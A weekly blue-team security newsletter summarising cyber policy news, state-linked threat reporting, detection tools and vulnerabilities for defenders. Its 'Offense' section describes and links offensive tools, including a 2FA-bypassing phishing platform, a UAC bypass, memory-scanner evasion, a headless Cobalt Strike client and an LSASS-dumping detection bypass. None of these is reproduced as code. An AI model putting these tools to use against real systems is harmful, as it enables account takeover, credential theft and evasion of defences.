Bluepurple Pulse: week ending September 11th
Note to self: don't leave it nine days before releases next time..
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything made it in this week due to the volume.
Operationally this week it all appears a little higher tempo than usual as you’ll see below from the reporting, whilst nothing specific appears to being driving it other than the general theme of global unpeace. Aside from that the UK is in mourning due to the death of Her Majesty.
In the high-level this week:
David Gonski calls for cyber risk defence to protect directors in Australia - this is a weak argument, basically says regulation scares good directors away.
EU to impose tough new rules on ‘internet of things’ product makers - only good news for the world when another market does this.
US Treasury Reissues Rules to Enforce Cyber Sanctions on Foreign Adversaries - due to volume organisations were confused - so this is intended to help.
Department of State Cybersecurity training series boosts global resilience against Democratic People's republic of Korea Malware - training in a states TTPs etc. is an interesting soft power offer for sure.
US Treasury Sanctions Iranian Ministry of Intelligence and Minister for Malign Cyber Activities - be interesting to see the impact.
United States Department of Justice Hosts Cryptocurrency Crimes Workshop for Estonian Counterparts - a different lens on defend forward.
The Externalisation of the EU’s Cybersecurity Regime: The Cyber Diplomacy Toolbox - a paper pointing out weaknesses in the EUs game around including problems of attribution and evidence collection and our Article questions whether the CFSP is fit for the digital age - oof.
International Journal of Cyber Diplomacy - from Romania - interesting articles, I’ll defer to others if they are good. I liked the concepts outlined in the article titled Cyber Diplomacy 3.0 - “Agile Diplomacy” to Promote Security and Innovation
Putin instructed intelligence to obtain technology for industry - Russian reporting on the instruction for economic espionage.
NSA, CISA, ODNI Release Software Supply Chain Guidance for Developers - - details here - and they are only just getting started..
NSA Releases Future Quantum-Resistant (QR) Algorithm Requirements for National Security Systems - starting gun officially fired.
The SSSCIP Ukraine and the National Cyber Security Directorate of Romania have signed a Memorandum of Understanding in cooperation for cyber defense - self organising states in Eastern Europe
Russia’s War on Ukraine Deepens International Cyber-Defense Cooperation - wider article from the Wall Street Journal basically highlighting the same thing at a macro level
Israel defence minister's cleaner jailed for trying to spy for Iran-linked hackers - amazing vetting failure
What’s Shaping India’s Policy on Cross-Border Data Flows? - the genesis prediction is as interesting as the reality - A 2019 report by India’s Ministry of Electronics and Information Technology predicted that India could have a $1 trillion digital economy by 2025
Website selling stolen login Credentials and other personally identifying information is seized and its operator charged for conspiracy and trafficking in unauthorized access devices - Initial access broker market smashed up
Interrogating the Cybersecurity Development Agenda: A Critical Reflection - for those involved in international capacity building as part of their international relations strategies this is likely worth a read.
Unpacking Russia's Cyberwarfare Capabilities - a good summary in open source for lots of organisations to usefully reference
US Army updates cyber training after some Graduates weren’t ready - fascinating insight into the talent pool scaling challenges in the US Army around cyber.
In job land this week the UK’s Joint Intelligence Organisation is hiring a Principal Intelligence Analyst (China Hostile Activity and Investment Security).
More broadly I have been reflecting on R&D pull through (what a CTO is accountable for) due to various interactions and several related articles this week.
The first was Hicks says Pentagon moving too slowly in transitioning DARPA tech to warfighters - this was interesting because it put in perspective my challenges and made me feel effective (always good) but also highlighted some of the challenges in cross organisational activities at scale. In the private sector to address this we create stripy teams who own the end to end, but when you get this level of complexity it is hard to see how you would do that - anyway interesting problem.
Then there was Synthetic DNA startup Catalog partners with Seagate for its DNA-based data storage platform. This approach is more common where industrial partners team up with start-ups, academia and similar. We did this a lot at Symantec to effectively outsource/de-risk bits of R&D with good results.
Finally there was the article Top CCP Scientist Diagnoses China's STEM Ills - The CCP's top science official is scared for the future of S&T in China. It provides some interesting insights into what happens when the world doesn’t entirely trust you and the potential long term implications of the underpinning R&D..
Enjoying this? don’t get via e-mail? subscribe:
Think someone else would benefit? Share:
Have a lovely Saturday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia / Ukraine
Initial access broker repurposing techniques in targeted attacks against Ukraine
Pierre-Marc Bureau details that Conti appears to have pivoted to support state intent. We expected this to happen earlier in the conflict, interesting it is happening now.
UAC-0098 is a threat actor that historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks. The attacker has recently shifted their focus to targeting Ukrainian organizations, the Ukrainian government, and European humanitarian and non-profit organizations. TAG assesses UAC-0098 acted as an initial access broker for various ransomware groups including Quantum and Conti, a Russian cybercrime gang known as FIN12 / WIZARD SPIDER.
Mass distribution of the AgentTesla malware
From Ukraine CERT-UA - the point of note is the wider regional targetting.
On August 30 and 31, 2022, the government computer emergency response team of Ukraine CERT-UA recorded mass mailings of emails with the topic "Technisches Zeichnen" among Ukrainian, Austrian and German organizations.
https://cert.gov.ua/article/1563322
Pro-Russian Group Targeting Ukraine Supporters with DDoS Attacks
Martin Chlumecký details a capability by a lesser known group working in Russian interests. The point of note here is the resilience built into the capability which will make disruption of the underlying capability challenging.
NoName057(16) is performing DDoS attacks on websites belonging to governments, news agencies, armies, suppliers, telecommunications companies, transportation authorities, financial institutions, and more in Ukraine and neighboring countries supporting Ukraine, like Ukraine itself, Estonia, Lithuania, Norway, and Poland. A full list of the group’s targets can be found at the end of this post.
To carry out DDoS attacks, hacker groups utilize botnets. They control them via C&C servers, sending commands to individual bots, which essentially act as soldiers. Uncovering and tracking botnets is complex and time-consuming.
https://decoded.avast.io/martinchlumecky/bobik/
Ragnar Locker Ransomware Targeting the Energy Sector
Given where energy is in the must have stakes this is interesting and a bold move. Not going to get them on any Christmas lists. Feels like the dimensions to the energy aspect of the conflict risk heating up (no pun intended).
Breach of a Pipeline Company : DESFA is a strategic energy-related company that has been claimed by Ragnar Locker as their victim.
Security Evasion Capabilities : Ragnar Locker checks if specific products are installed, especially security products (antivirus), virtual-based software, backup solutions and IT remote management solutions.
Ransomware Actors Targeting the Energy Sector : This is the second important pipeline company that has been hit by ransomware, along with Colonial Pipeline. Furthermore, four energy companies have been hit recently by ransomware, including three in Europe.
Active for Three Years : Ragnar Locker is both a ransomware group and the name of the software in use. They have been running since 2019 and targeting critical industries. They use the double extortion scheme.
Excluding the Commonwealth of Independent States : Ragnar Locker avoids being executed from countries since the group is located in the Commonwealth of Independent States (CIS).
Worok: The big picture
Thibaut Passilly details a new APT with their own capability known to use the Microsoft Exchange ProxyShell as their initial access.
[We]recently found targeted attacks that used undocumented tools against various high-profile companies and local governments mostly in Asia. These attacks were conducted by a previously unknown espionage group that we have named Worok and that has been active since at least 2020. Worok’s toolset includes a C++ loader CLRLoad, a PowerShell backdoor PowHeartBeat, and a C# loader PNGLoad that uses steganography to extract hidden malicious payloads from PNG files.
https://www.welivesecurity.com/2022/09/06/worok-big-picture/
BRONZE PRESIDENT Targets Government Officials
China being China all over the globe. The initial access appears RAR files, LNK files and decoy documents.
In June and July 2022, [our] researchers identified a PlugX malware campaign targeting computers belonging to government officials of several countries in Europe, the Middle East, and South America. PlugX is modular malware that contacts a command and control (C2) server for tasking and can download additional plugins to enhance its capability beyond basic information gathering. Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.
https://www.secureworks.com/blog/bronze-president-targets-government-officials
DangerousSavanna: Two-year long campaign targets financial institutions in French-speaking Africa
This actually sounds like a Red Team. The tradecraft bleed between both shows that should organised crime want to ‘get into that cyber thing’ then it won’t really take them much. The targeting of countries with less developed cyber defence capabilities is the key point in this reporting. ANSSI is going to be busy.
The threat actors behind this campaign use spear-phishing as a means of initial infection, sending emails with malicious attachments to the employees of financial institutions in at least five different French-speaking countries: Ivory Coast, Morocco, Cameroon, Senegal, and Togo. In the last few months, the campaign heavily focused on Ivory Coast. Judging by the victimology and tactics, techniques, and procedures (TTPs), we can assess with medium to high confidence that the motivation behind DangerousSavanna is likely financial.
DangerousSavanna tends to install relatively unsophisticated software tools in the infected environments. These tools are both self-written and based on open-source projects such as Metasploit, PoshC2, DWservice, and AsyncRAT. The threat actors’ creativity is on display in the initial infection stage, as they persistently pursue the employees of the targeted companies, constantly changing infection chains that utilize a wide range of malicious file types, from self-written executable loaders and malicious documents, to ISO, LNK, JAR and VBE files in various combinations.
Iran
Various bits of reporting on Iran this week
Iranian attacks against the Albanian government
Various bits of reporting here, starting with Albania cuts Iran ties over cyberattack, U.S. vows further action showing the geopolitical implications.
Then the technical reporting came firstly from Luke Jenkins, Emiel Haeghebaert, Alice Revelli and Ben Read
[We] identified the ROADSWEEP ransomware family and a Telegram persona which targeted the Albanian government in a politically motivated disruptive operation ahead of an Iranian opposition organization’s conference in late July 2022.
A previously unknown backdoor CHIMNEYSWEEP and a new variant of the ZEROCLEAR wiper may also have been involved.
CHIMNEYSWEEP malware distribution data and decoy content, the operation’s timing and politically themed content, and the possible involvement of the ZEROCLEAR wiper indicate an Iranian threat actor is likely responsible.
This activity is a geographic expansion of Iranian disruptive cyber operations, conducted against a NATO member state. It may indicate an increased tolerance of risk when employing disruptive tools against countries perceived to be working against Iranian interests.
Then further reporting from the incident response.
APT42: Crooked Charms, Cons and Compromises
Congratulations to Iran for getting appointed a new APT number. Their targeting strays into the UK, USA, Australia and Italy.
The targeting patterns for APT42 operations are similar to other Iranian cyber espionage actors, with a large segment of activity focused on the Middle East region. However, unlike other suspected IRGC-affiliated cyber espionage groups that have focused on targeting the defense industrial base or conducting large-scale collection of personally identifiable information (PII), APT42 primarily targets organizations and individuals deemed opponents or enemies of the regime, specifically gaining access to their personal accounts and mobile devices. The group has consistently targeted Western think tanks, researchers, journalists, current Western government officials, former Iranian government officials and the Iranian diaspora abroad.
https://www.mandiant.com/media/17826
Charming Kitten: “Can We Have A Meeting?”
More Iranian reporting this week, this is very interesting. They are impersonating scientists for their initial contacts. For those in academia please do take note of this tradecraft.
Charming Kitten (known as APT42, ITG18, UNC788, TA453, PHOSPHORUS, Yellow Garuda, also APT35) is an Iranian state-sponsored threat group1 that conducts persistent cyber espionage operations to have extensive surveillance of targeted Iranian and foreign citizens, who have strategic intelligence value for the Islamic Revolutionary Guard Corps (IRGC).
Samuel Valable is one of the researchers at the French National Center for Scientific Research (CNRS) who is specialist in imaging and therapeutic strategies for cancers and brain tissues.
Our latest findings showed that the Charming Kitten hacking group impersonated him on social media platforms, by using his academic and professional background in CNRS, and created accounts under his name. The Iranian state-backed hackers created a fake LinkedIn account and then targeted researchers and academia in other countries to collect intelligence and hack their accounts.
https://blog.certfa.com/posts/charming-kitten-can-we-wave-a-meeting/
Profiling DEV-0270: PHOSPHORUS’ ransomware operations
Even more Iranian reporting on the team which quick flips hi severity vulnerabilities to secure access and then conduct ransomware operations. Those financial sanctions are working and thus the need to diversify.
DEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.
EvilProxy Phishing-as-a-Service with MFA Bypass
Valuable insight into a criminal phishing service which can bypass multi-factor authentication. The rapid commoditisation of this capability means that webauthn can’t arrive soon enough in my mind.
EvilProxy actors are using Reverse Proxy and Cookie Injection methods to bypass 2FA authentication – proxyfying victim’s session. Previously such methods have been seen in targeted campaigns of APT and cyberespionage groups, however now these methods have been successfully productized in EvilProxy which highlights the significance of growth in attacks against online-services and MFA authorization mechanisms.
Based on the ongoing investigation surrounding the result of attacks against multiple employees from Fortune 500 companies,
APT group Evilnum launches new round of cyber attacks on online transactions
The tradecraft is basic the targets are interesting i.e. it’s all about the money..
This round of cyberattacks occurred from late July to early August. Evilnum attackers continued to use their usual attack ideas during the campaign, including decoy files of pif type and compressed package type, attack chains built around the self-developed Trojan program DarkMe, and various third-party tools.
DarkCasino is an APT operation discovered by Fuying Lab. The action is mainly aimed at Western European countries on the Mediterranean coast, targeting online transaction cash flow. For the analysis of the DarkCasino operation, please refer to the published report "DARKCASINO Operation: In- depth Analysis of APT Organization EVILNUM's Recent Attacks"
TA505 Group's TeslaGun In-Depth Analysis
This team in Turkey/Switzerland gained access to the backend infrastructure of threat actor.
This report provides insight into how TA505 enables and manages these attacks through its ”TeslaGun” control panel.
https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf
Shikitega - New stealthy malware targeting Linux
Interesting to see the evolution of Linux implants. Ofer Caspi provides insight into a new family in part built on open source. Interesting all this complexity results in a cryptominer of all things.
The malware downloads and executes the Metasploit’s “Mettle” meterpreter to maximize its control on infected machines.
Shikitega exploits system vulnerabilities to gain high privileges, persist and execute crypto miner.
The malware uses a polymorphic encoder to make it more difficult to detect by anti-virus engines.
Shikitega abuse legitimate cloud services to store some of its command and control servers (C&C).
https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux
New Remote Access Trojan (RAT)
appears to target Farsi-speaking code developers by using a Microsoft Word document that includes a Microsoft Dynamic Data Exchange (DDE) exploit
https://www.safebreach.com/resources/blog/remote-access-trojan-coderat/
PlugX RAT Loader Evolution
Detail of this pervasive capability used by China.
The Rule of Three: The malware may be delivered differently depending on the campaigns such as whether the initial delivering format is self de-archiving or not. However, the PlugX loader always consists of three main components: a legitimate executable, a malicious module, and a malicious payload. The malware has been around for over a decade, but the format of the malware has not changed.
Security Evasion-Focused Techniques: PlugX loader is known for utilizing DLL-Sideloading techniques for evasion purposes. However, the malware is packing additional evasion techniques. This increases the chance of deploying the main PlugX payload successfully.
https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution
BumbleBee a New Modular Backdoor Evolved From BookWorm
Vickie Su, Ted Lee and Nick Dai cause a name clash into the malware naming world (maybe we need a ITU or UN to co-ordinate). That aside a refactored Chinese capability has stepped onto the field which appeared to cause some analysis headaches.
BumbleBee is a modular backdoor that comprises two applications, a server and a client application (a master and slaver application, respectively in the malware’s jargon). Once the client application is deployed on the target computer (these are commonly local government devices), threat actors can control the machine using the server module. Let us take a deeper look into this backdoor.
Since BumbleBee and Bookworm share the same features, BumbleBee is likely a refactored form of the latter. Focusing on Asian local government targets, all signs point to a suspect linked to a Chinese hacker group.
Korea
Lots of reporting around this week so they get their own sub category like Iran.
$30 Million Seized: How the Cryptocurrency Community Is Making It Difficult for North Korean Hackers To Profit
Someone had a bad day in the office in the Hermit Kingdom.
With the help of law enforcement and leading organizations in the cryptocurrency industry, more than $30 million worth of cryptocurrency stolen by North Korean-linked hackers has been seized. This marks the first time ever that cryptocurrency stolen by a North Korean hacking group has been seized, and we’re confident it won’t be the last.
https://blog.chainalysis.com/reports/axie-infinity-ronin-bridge-dprk-hack-seizure/
Lazarus and the tale of three RATs
Jung soo An, Asheer Malhotra and Vitor Ventura out new capability from the Hermit Kingdom. The sector targeting (along with Russia’s) is a little worrying as head to autumn/winter. Known vulnerabilities were exploited showing their ability to pull through.
[We have been] tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by the United States government.
This campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into targeted organizations.
Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.
The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary's nation-state.
[We] discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.
[We] also discovered the use of a recently disclosed implant we're calling "MagicRAT" in this campaign.
https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
Malicious Word Files Targeting Specific Individuals Related to North Korea
Very basic tradecraft in this reporting from South Korea on North Korean activity. Just the nature is relentless.
[We] discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field. The filenames of the recently confirmed Word files are as follows:
https://asec.ahnlab.com/en/38182/
Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies
Various known vulnerabilities exploited here in quite an aggressive campaign including the use of Bitlocker for some ransomware operations.
Around 20 businesses appear to have been infiltrated, including semiconductor, injection machine, resort, construction, and software companies. It seems that hackers have performed attacks without specific targets. Since this includes cases where the attack started on a disclosed and vulnerable server and then escalated to the final stage of ransomware infection, particular discretion is advised.
Out of the cases identified so far, there are few ransomware infections by the hacker group mentioned above. The hacker group does not make new ransomware, but instead abuses Windows’ basic encryption program, BitLocker, to encrypt disks. BitLocker is a disk encryption tool provided and used by Windows, and is originally a tool used for disk security. This supports the command line method, and at its core, uses the command Manage-bde to enable the use of the BitLocker feature and when a drive is locked, a password is required to access it.
https://asec.ahnlab.com/en/38156/
Asbit: An Emerging Remote Desktop Trojan
Paul Kimayong outs a Chinese implant - note the use of DNS over HTTPs in an attempt to avoid passive DNS detection as well as any filtering. This will make some cyber threat intelligence / intrusion analysts sob a little I suspect.
[We are] currently monitoring an emerging Chinese Remote Desktop Trojan called Asbit. It’s a remote access Trojan being advertised on its developer’s website as a “Fast Remote Desktop”. This RAT first made its appearance in 2021 and kept updating its infrastructure and features as it went along. It uses a number of strategies to avoid endpoint and network detection. By using DNS over HTTPS (DoH) to resolve the IP addresses of its control servers, it aims to get past network DNS filters.
https://blogs.juniper.net/en-us/threat-research/asbit-an-emerging-remote-desktop-trojan
Discovery
How we find and understand the latent compromises within our environments.
Sensitive Command (Canary) Token - So much offense in my defense
Great work here from Casey, the use of SilentProcessExit gflag is 😽
This quick/simple Canarytoken alerts you any time your chosen command is executed on a [Windows] host.
https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html
Reviewing macOS Unified Logs
Alexander Holcomb shows us some macOS investigation tradecraft due to changes in the OS.
Beginning with macOS 10.12 (Sierra), Apple introduced a key change to how logging was done on their systems. This new logging system replaced common Unix logs with macOS Unified Logs. These logs can provide forensic investigators a valuable artifact to aid in investigating macOS systems or other Apple devices.
In this blog post, we will cover an overview of the Unified Logs and the challenges presented in using them during an investigation. Along with this blog post, we also released a tool called “macos-unifiedlogs" to help overcome some of the challenges in parsing log data, and to provide examples of how it can uncover vital information during an investigation.
https://www.mandiant.com/resources/blog/reviewing-macos-unified-logs
Merry Maker 2.0
Merry Maker is a fully scalable tool to detect the presence of digital skimmers - this is excellent and wonderful they open sourced it.
https://github.com/target/mmk-ui-api
Threat Hunting with Sysmon and Graphs
Sam shows the value of graph databases in threat hunting. Bonus points for using open source.
In this post we are going to try to explain how to perform Threat Hunting using sysmon and how we can improve it using a graph database.
https://medium.com/@SecSamDev/threat-hunting-with-sysmon-and-graphs-4709215b7c91
Forensic Detection of Files Deleted via SDelete - as used by APT29
Lina Lau shares tradecraft to known if you’ve been visited by Russia.
When sdelete is utilised, it leaves obvious traces in the USN Journal, $J file where 26 unique entries will be created in alphabetic order as pictured below. This is a dead giveaway that “sdelete” was utilised by the threat actors.
https://www.inversecos.com/2022/09/forensic-detection-of-files-deleted-via.html
Extract BootTimes from Windows
Grzegorz Tworek provides another source to validate when a host was booted even if anti-forensics have been deployed.
The script focuses on extracting boot times from bootstat.dat - If you need to extract other data from such file
https://github.com/gtworek/PSBits/blob/master/DFIR/Extract-BootTimes.ps1
Get-RdpLogonEvent
Marc-André Moreau provides a neat little script to help understand what technique was used.
extract the list of recent RDP logons from the event viewer and become a magician 🧙♀️ that can answer impossible questions like "is it really using Kerberos (nope), or did it downgrade to NTLM (again)"?
gist.github.com/awakecoding/5fda938a5fd2d29ebffb31eb023fe51c
Introducing Sandbox Scryer
Greg Dalcher and Joel Spurlock release this work aid to overworked intelligence and operations teams.
Sandbox Scryer is an open-source tool for producing threat hunting and intelligence data from public sandbox detonation output
The tool leverages the MITRE ATT&CK Framework to organize and prioritize findings, assisting in assembling indicators of compromise (IOCs), understanding attack movement and hunting threats
By allowing researchers to send thousands of samples to a sandbox for building a profile for use with the ATT&CK technique, Sandbox Scryer can help solve use cases at scale
The tool is intended for cybersecurity professionals who are interested in threat hunting and attack analysis leveraging sandbox output data
Sandbox Scryer consumes output from the free and public Hybrid Analysis malware analysis service to help analysts expedite and scale threat hunting as part of security operations center (SOC) operations
https://www.crowdstrike.com/blog/sandbox-scryer-free-threat-hunting-tool/
Defence
How we proactively defend our environments.
Defeating Ransomware by Using Sysmon and PowerShell
Mehmet Ergene provides a cheap (as in free) solution that some organisations might get value from.
Creating a honey folder and putting a test file in it. A honey folder is kind of a trap a ransomware will check and encrypt the files in it.
Configuring the Sysmon to monitor file creation events under the honey folder. This is because ransomware deletes the original file and puts the encrypted one into the same location.
Creating a PowerShell script that reads the Sysmon EventID 11 events, parses the Process Id from the event, and dumps its memory to a file.
Creating a scheduled task that triggers on Sysmon EventID 11 event. The task will run the PowerShell script, and the script will dump the memory.
How to centralize findings and automate deletion for unused AWS IAM roles
Hong Pham shares how to have good hygiene in AWS.
krie: Linux Kernel Runtime Integrity with eBPF
Guillaume Fournier provides some defence in depth / another hurdle for threat actors to consider when doing their thing on linux.
KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.
https://github.com/Gui774ume/krie
Hardening Kitty
Michael Schneider, Travis McDade and ataumo provide a script which checks and hardens your Windows configuration
https://github.com/scipag/HardeningKitty
uncover 0.0.7
With the latest version of Uncover, now easily search for exposed assets using multiple search engines at once.
Shodan
Censys
FOFA
Hunter
Quake
https://github.com/projectdiscovery/uncover/releases/tag/v0.0.7
Incident Response in AWS
Chris Farris provides a good overview of the real-world steps and differences.
https://www.chrisfarris.com/post/aws-ir/
Vulnerability
Our attack surface.
.NET: External Entity Injection during XML signature verification reachable via SAML
This is another epic vulnerability from Felix Wilhelm with SAML again the attack surface. As with last weeks the root cause will pop up via various other attack surfaces also.
https://bugs.chromium.org/p/project-zero/issues/detail?id=2313
WordPress Core - Unauthenticated Blind SSRF
Simon Scannell and Thomas Chauchefoin document a vulnerability which will have a long tail of value in exploitation due to the size of the WordPress deployments out there. The impact of this will only be felt in the future..
https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
Web pages can overwrite your system clipboard without your knowledge
Jeff Johnson documents this, the real impact could be fun if you used this to inject malicious documents (not tested).
https://lapcatsoftware.com/articles/clipboard.html
Offense
Attack capability, techniques and tradecraft.
EvilnoVNC: Ready to go Phishing Platform
We saw it as a service above and this is if you want it on premises from Joel GM.
Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection. In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and more.
https://github.com/JoelGMSec/EvilnoVNC
Elevator: UAC Bypass by abusing RPC and debug objects
Kurosh Dabbagh Escalante provides some detection headaches with this capability.
This is done by abusing the behaviour of the RPC server that implements the UAC feature, as demonstrated by James Forshaw in his article Calling Local Windows RPC Servers from .NET. The tool does not require to drop an extra DLL etc.
https://github.com/Kudaes/Elevator
Avoiding Memory Scanners: Customizing Malware to Evade YARA, PE-sieve, and More
Kyle Avery walks through how to avoid various malware detection techniques.
https://blog.kyleavery.com/posts/avoiding-memory-scanners/
Defeating eBPF Uprobe Monitoring
Célian Glénaz just oozes quality with this post. Very useful defensive and offensive research here.
This article introduces a kind of eBPF program that may be used to monitor userspace programs. It first introduces you to eBPF and uprobes and then explores the flaws that we found in uprobes.
https://blog.quarkslab.com/defeating-ebpf-uprobe-monitoring.html
“GIFShell” — Covert Attack Chain and C2 Utilizing Microsoft Teams GIFs
Some vulnerabilities and some tradecraft combined to have fun.
Cobaltstrike Headless
HackOps (I just made that up) via Slack is now a thing
Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client
https://github.com/CodeXTF2/cobaltstrike-headless
nanodump Updated
Will subvert some detection techniques relied on by blueteams.
add --duplicate-local technique · this allows nanodump to open a handle to LSASS with PROCESS_QUERY_LIMITED_INFORMATION and elevate the handle later this way, we might bypass several detections
https://github.com/helpsystems/nanodump/commit/0c2918e525ab89442d06804fdc6dee14ed17af2f
Exploitation
What is being exploited.
Mirai Variant MooBot Targeting D-Link Devices
Chao Lei, Zhibin Zhang, Cecilia Hu and Aveek Das show in the wild exploitation of various devices to built a botnet..
The vulnerabilities exploited include:
CVE-2015-2051: D-Link HNAP SOAPAction Header Command Execution Vulnerability
CVE-2018-6530: D-Link SOAP Interface Remote Code Execution Vulnerability
CVE-2022-26258: D-Link Remote Command Execution Vulnerability
CVE-2022-28958: D-Link Remote Command Execution Vulnerability
https://unit42.paloaltonetworks.com/moobot-d-link-devices/
WDAC driver blocklist from Microsoft has been updated to v10.0.25180.0
Florian Stosse dumps the latest diff which shows among other things we can infer the IOBit Unlock driver is being exploited in the wild.
Tooling and Techniques
Low level tooling for attack and defence researchers.
SiliFuzz - Fuzzing CPUs by proxy
Kostya Serebryany et al release a tool chain which I suspect will unearth some interesting latent issues in both real CPUs and hypervisors.
SiliFuzz is a system that finds CPU defects by fuzzing software proxies, like CPU simulators or disassemblers, and then executing the accumulated test inputs (known as the corpus) on actual CPUs on a large scale.
https://github.com/google/silifuzz
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Monthly Threat Actor Group Intelligence Report, July 2022, Korean - released late August
Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection
Basic Authentication Deprecation in Exchange Online – September 2022 Update
Northwestern Polytechnical University was allegedly attacked by the US - what looks like on the face of it an information operation on some old artefacts
China adopting western style disclosure/logos for threat groups - this list includes alleged western actors
European Cybersecurity in Context A Policy-Oriented Comparative Analysis
JSAC2023 - Tokyo, January 25-26, 2023 - Call for Papers
The Sydney Dialogue - summit for emerging, critical, cyber & space technologies - Sydney on 4 & 5 April 2023.
That’s all folks.. until next week..